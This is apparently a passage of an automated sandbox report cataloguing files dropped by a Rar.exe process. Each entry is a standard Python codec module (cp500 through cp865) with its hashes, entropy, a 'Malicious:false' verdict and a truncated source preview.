                                                                                                                                                                                                                                  SHA-512:B9DD5137040DC57308093D9C71291668CE7CBEDCA11DBC0D85187C6DEE568CA25F69B67F7FB08A2CA248D966EC622C7CE0DD35C0BA2CD77C860274A11A50827D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp500 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP500.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp500',.. e
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13995
                                                                                                                                                                                                                                  Entropy (8bit):4.642939154809849
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:fhsuOTDvRD9lPEeXGyQCmEdfn4OH3NGzN7KwAKYWEDdunzT:STSeXGy1dc5
                                                                                                                                                                                                                                  MD5:9B7E8AB7C2EE4F82BE09E14F3D3AEA4C
                                                                                                                                                                                                                                  SHA1:AA76BF3210EF70474330E0212A8B2EDEB518DC5B
                                                                                                                                                                                                                                  SHA-256:016BDB7208A0D6BFAF8972C1F6BB4B3DE39C77E026B49ED106866D592BE4810B
                                                                                                                                                                                                                                  SHA-512:0E706CB3E9199663D2DE2E6443F2C9E46279F11ED32BFFE482C4262D7CBD1A30F49018588F96C037E147D9DCE27F29C4ABC1EAAD230CF09B73317F5872967CCD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Python Character Mapping Codec cp720 generated on Windows:..Vista 6.0.6002 SP2 Multiprocessor Free with the command:.. python Tools/unicode/genwincodec.py 720.."""#"......import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codec
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35379
                                                                                                                                                                                                                                  Entropy (8bit):4.616163070442315
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:VmDXpX8Jytkjh4wVoEm3clxHRE8q6HWJn4AVhUise69/TUMy:8DXizjhJVoEm3clx6y2BFH25W
                                                                                                                                                                                                                                  MD5:BD60E98CC59C8BD60874F59A06E30F78
                                                                                                                                                                                                                                  SHA1:D0086209BA6B3D56964EA7295A8EA54BC5AA02D7
                                                                                                                                                                                                                                  SHA-256:F2DA9D418B2364C2E1A587B7A6E26FF5601C16AA7993070F2C955DDF2A1F860D
                                                                                                                                                                                                                                  SHA-512:377D0F87DDBB23D9CCAABE35085EF1E92FCE766B01E55774F4371EA281A03825D141A6F905C90C419B19D09529A8185827C9F4FC6EB176BBADE3DFB478AFB1A0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp737 generated from 'VENDORS/MICSFT/PC/CP737.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp737',.. encode=Codec().enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35173
                                                                                                                                                                                                                                  Entropy (8bit):4.550355257462109
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:8HLsuYDvRxp2YM0AQ7COJgJOlSwrE0PXRN/h4wcuSMy+PeD3xUpWS2449jBRWJnI:lRNALMSkjh4wVHeahcHWJn4AVztzXsj5
                                                                                                                                                                                                                                  MD5:CBEF285952C0476BF35BFCD7E7818919
                                                                                                                                                                                                                                  SHA1:1C61953A3AE6638EE415CA2A93710FF3D8E59D68
                                                                                                                                                                                                                                  SHA-256:00F2A5E71CA98ED656EC430A80FC2E971988A0A33EBDEA77661BDBE24FE2FBFF
                                                                                                                                                                                                                                  SHA-512:2F78E73843365DB7F164C2F3C7CD2AE5860D80A11BAF9212BA54C58F9B08C99035FEF6A200D836036AF2B4F1F286B0C2447953203B0EB1C87FD5F1DBE3D24396
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp775 generated from 'VENDORS/MICSFT/PC/CP775.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp775',.. encode=Codec().enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34803
                                                                                                                                                                                                                                  Entropy (8bit):4.521332806052938
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:QHLsuYDvRVSUpAJZjJBfX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxspGf6w6F44j:hbAZSkjh4wV5j9eJTHWJn4AVgqur
                                                                                                                                                                                                                                  MD5:F5F11DA44C65B2A394A4137E36E35E82
                                                                                                                                                                                                                                  SHA1:BD17C2F9156D704AEAB144A4C1B5B8CA436A5D73
                                                                                                                                                                                                                                  SHA-256:DCBE5938D7FE65072D4A286A184046DB211544C30F0C3C370B9CD594CF3B36BD
                                                                                                                                                                                                                                  SHA-512:58AE94059D5ABDC1892FE28DA1646249A0A96817B790BA468B1AA11983A8292AB1FCD1357C9EF9771DE11685FC999791DB184CAF16E7E05D634680AF8A74D6BA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP850.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp850',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35700
                                                                                                                                                                                                                                  Entropy (8bit):4.529290225811869
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:SHLsuYDvRzgbY6oxCzhnfnh7gwrE0PXRN/h4wcuSMyLLUhmCIbp0w449jBRWJn4d:vgCkjh4wVy/xHWJn4AV9dQr
                                                                                                                                                                                                                                  MD5:BB2BA9443AE7BD887BA8EAC3E622366A
                                                                                                                                                                                                                                  SHA1:777E47CA86C4CF65DA68603DDACD6C78B89E0DC7
                                                                                                                                                                                                                                  SHA-256:8B6AD769607B3DB0D60E4BA1A6321A3823AD8460890D48C816220DCDF8CBEA98
                                                                                                                                                                                                                                  SHA-512:EBAEC3C9AB014DD4B9629DF511D5E98A9CC88F4035841756142AFC462AB00D07B92050F62C89CF7B2C4891E7D4165F3B3C78548062AACE86E4680C6E2FF3F996
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP852.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp852',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34548
                                                                                                                                                                                                                                  Entropy (8bit):4.55461632698867
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:PHLsuYDvR+mIj30FeMwrE0PXRN/h4wcuSM2fi+ypK2449jBRWJn4bkVd8nOiB6HL:i+0rkjh4wV8iN3HWJn4AVd8n0r
                                                                                                                                                                                                                                  MD5:7C84762C6FD5251CD237754FEB1752D4
                                                                                                                                                                                                                                  SHA1:B4F083D0AC32E26B77DB2E99F53C079DB7B844A1
                                                                                                                                                                                                                                  SHA-256:F4F47A5CF3FE5A8CD269B68A73C1DC293A75CD3B9C0489CFA600919B47B35A4C
                                                                                                                                                                                                                                  SHA-512:D841B04E354ADD8C3D337A6952163CDC8D74FE8F561418A8DEA9C7C5986EE15179F9F5B2336880ABD279CE45AA46CB55020EDE9CDF0FE8B7EA093D1033B5F108
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP855.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp855',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12730
                                                                                                                                                                                                                                  Entropy (8bit):4.6600353742865055
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:JgHhsuOTDvRPUrXPLouhIAs2+i+/4mwNLlYip2MUo8ONT:jT5uhIAlg02MH
                                                                                                                                                                                                                                  MD5:EE5A43420B08D06B0B2D72A49F00216D
                                                                                                                                                                                                                                  SHA1:5CAB8D55CB2910C092AF40C921E0B0959933C216
                                                                                                                                                                                                                                  SHA-256:F0C9DAC1B08D688B81B4F11CA603336FBD5C7FC4C1A30E8B7836283C2AD9A8E7
                                                                                                                                                                                                                                  SHA-512:97CC6127C21CF49679AD8AC1B47D22D674A07D83BDCD7FAB54B3C821F8DC531435F3B12EE63222C92E3A9D6895404BA857926BA2CA52CDB1BD3ED51B49009C65
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp856 generated from 'MAPPINGS/VENDORS/MISC/CP856.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp856',.. encode=Cod
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34602
                                                                                                                                                                                                                                  Entropy (8bit):4.528500526287676
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:BHLsuYDvR8LmUdMAJZjy5xSwrE0PXRN/h4wcuSMMksbYevMScnepGW449jBRWJn+:4FAcSkjh4wVMuecebHWJn4AVk2Yr
                                                                                                                                                                                                                                  MD5:DD1F84F2921D49CF944DF4BCF6ECF7E8
                                                                                                                                                                                                                                  SHA1:7EEE7B6CAA8120C4D26E96FCCC21C4474BD2652A
                                                                                                                                                                                                                                  SHA-256:8AE4CB6989342105C513678480ECBDF2D5D8E534E69704964D0FB4D2A960039B
                                                                                                                                                                                                                                  SHA-512:92DB4E13E84876B51B2600F503C56857E96F06A1F23C327762372F97628C766B0E524568672FBF3BA07B26A4284C1AEB522BD433F3ABB9704CF9277157B95832
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP857.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp857',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34713
                                                                                                                                                                                                                                  Entropy (8bit):4.518245366498134
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:CLsuYDvR9SUpAJZjJBIX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxNpGf6w6F4490:3jAYSkjh4wV5j9e2THWJn4AVgq/r
                                                                                                                                                                                                                                  MD5:F0B8B1B55A90C1EA058759AD18834A75
                                                                                                                                                                                                                                  SHA1:FD7AFDDE40956991241D6130F72A40D1C655B15B
                                                                                                                                                                                                                                  SHA-256:04A67B43EFA1E0CE2D80791C290BC2C8EA01C3991EB3DF37528B1DD575B12330
                                                                                                                                                                                                                                  SHA-512:72F7905616B3B3F9D961E4A605B15A8B9D427E13A82B1BA9AC1F2380E961DE6848A9C5068A57DE6CF62E0CEC5D9E6C2D7310F906D0EC16CAC345E48AA1ABF352
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec for CP858, modified from cp850....."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp858',.. encode=Codec().encode,.. decode=Codec().decode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35379
                                                                                                                                                                                                                                  Entropy (8bit):4.587856666654445
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/HLsuYDvRGYj/bXdiaYzIUqwrE0PXRN/h4wcuSMBmkwNvuD8HtIMpWZEt449jBRq:SfnZkjh4wVMjNjxAEJHWJn4AVWIcOMy
                                                                                                                                                                                                                                  MD5:1F0B22586EC65A59C966A709024E35E4
                                                                                                                                                                                                                                  SHA1:143BCD55359AD3B9506D6583D04A8C1BF32366BD
                                                                                                                                                                                                                                  SHA-256:E2B8B4B2658ECC3DC53D4B0760AEA95517BE298FAFBFA69574B08933747922BE
                                                                                                                                                                                                                                  SHA-512:7859FBC58DD5B68614F3F83DA28AA600E86A6F2DB7E011870B212E4D721478A8028D893AB666212DA1B1D38D41BB9E03B985C555154E33A20D71D2449DE7FDF2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP860.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp860',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35331
                                                                                                                                                                                                                                  Entropy (8bit):4.588014438980019
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:FfLnZkjh4wVlPVjxAEJHWJn4AVPScqPMy:JqjhJVbxAEJ2BFDS
                                                                                                                                                                                                                                  MD5:83CFB87E2BB8A42739A03DA1D979AF6A
                                                                                                                                                                                                                                  SHA1:97C16F469B56F437F521C482C613D4AEC6EF3206
                                                                                                                                                                                                                                  SHA-256:D7FE52A55FDCAC4E6E9ECDC4884C793D1FEB345D0276B074214DB1BF4BCF3033
                                                                                                                                                                                                                                  SHA-512:589B6933A5E45176210EA18997B056F41A6B03D765668B7328577D5CF8EEC9CF55B6247E225835D4666EB2AA0714ED927902929B75E27711437612BF9463D89E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP861.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp861',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34068
                                                                                                                                                                                                                                  Entropy (8bit):4.605627535144471
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:oPFL+DZkjh4wVOjIVjx79EJHWJn4AVE6AsqPMy:8UDqjhJVkKx79EJ2BFX7S
                                                                                                                                                                                                                                  MD5:D22ABCA28D2425D802F53021178224A1
                                                                                                                                                                                                                                  SHA1:D26E991DA020C07E58C03506347803A88230A6BB
                                                                                                                                                                                                                                  SHA-256:6D99C0415136CE45AB438C8238772A1A132E7B38212C623467C2170F1A8AAE75
                                                                                                                                                                                                                                  SHA-512:66E7C898ED749CF2706EA877FB099F50477EC5EA3C0FB4F2FA189F4E849D37AD01E7899BFC04A3D60D6CD5A1D42CFF69E71D0A39BE5F51C919543D22C2D82C6A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP862.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp862',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34950
                                                                                                                                                                                                                                  Entropy (8bit):4.597040843450106
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:DQ6LHZkjh4wV5VvxAEJHWJn4AV7qmqPMy:VqjhJVjxAEJ2BFtS
                                                                                                                                                                                                                                  MD5:13279C9ED7C1F7AF8722F9EB3A1B595B
                                                                                                                                                                                                                                  SHA1:BCF042EA7D75E802EE940B3C979626DCD0FAAD33
                                                                                                                                                                                                                                  SHA-256:32FC23645A773EBB3247B3692D0525EA43513B358DD0350EF3A171864E326335
                                                                                                                                                                                                                                  SHA-512:95CDDCB21D1E738A6850BEA50F6ABD8BBC537F916AC1B3BC16449710EECCDD6B9A54A584A6E40F89E3068B601F43EB297214B1585C9F658B7901BE8F1CBB5162
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP863.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp863',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34353
                                                                                                                                                                                                                                  Entropy (8bit):4.587380932355719
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:THLsuYDvRKLaH2bdfn8yrE0PXRQ/h4wcuSMurHUF3zZUB+yEsqj44HjBRWJn4bkg:On2quKh4wVU2HWJn4AVXwn
                                                                                                                                                                                                                                  MD5:30CBEC79DA2D6565A1C62EF240272223
                                                                                                                                                                                                                                  SHA1:00C4D427BBE2ADEC7FD3EB73C4F025523D352EA6
                                                                                                                                                                                                                                  SHA-256:E8879DB3682B0F234BFCF97FE74A3A7DB63CFD5F40281F580E911932DEC4A4D3
                                                                                                                                                                                                                                  SHA-512:69191F9A4D7089C74A5CA459D0A325BD21347AAC6CAA7F2D4DBE7835A73CD31CCD23C395B11ED91AB55C1592456C7D39A6F3D2CBF1CD2338A27B921A41435864
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP864.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp864',.. encode=Codec().encode,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35316
                                                                                                                                                                                                                                  Entropy (8bit):4.589958887283082
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:RQVLCZkjh4wVXjIVSxAEJHWJn4AVUVcqPMy:PqjhJVz5xAEJ2BFfS
                                                                                                                                                                                                                                  MD5:FE9E2A87FF8164A9602AF05FE30F64FC
                                                                                                                                                                                                                                  SHA1:3BEC0843F48826EC25A9D660B9A578148085D82F
                                                                                                                                                                                                                                  SHA-256:0722BBF3A0F93700E99B3816E9E52C75674E14319146F9AC3FD1E17F87E66CB0
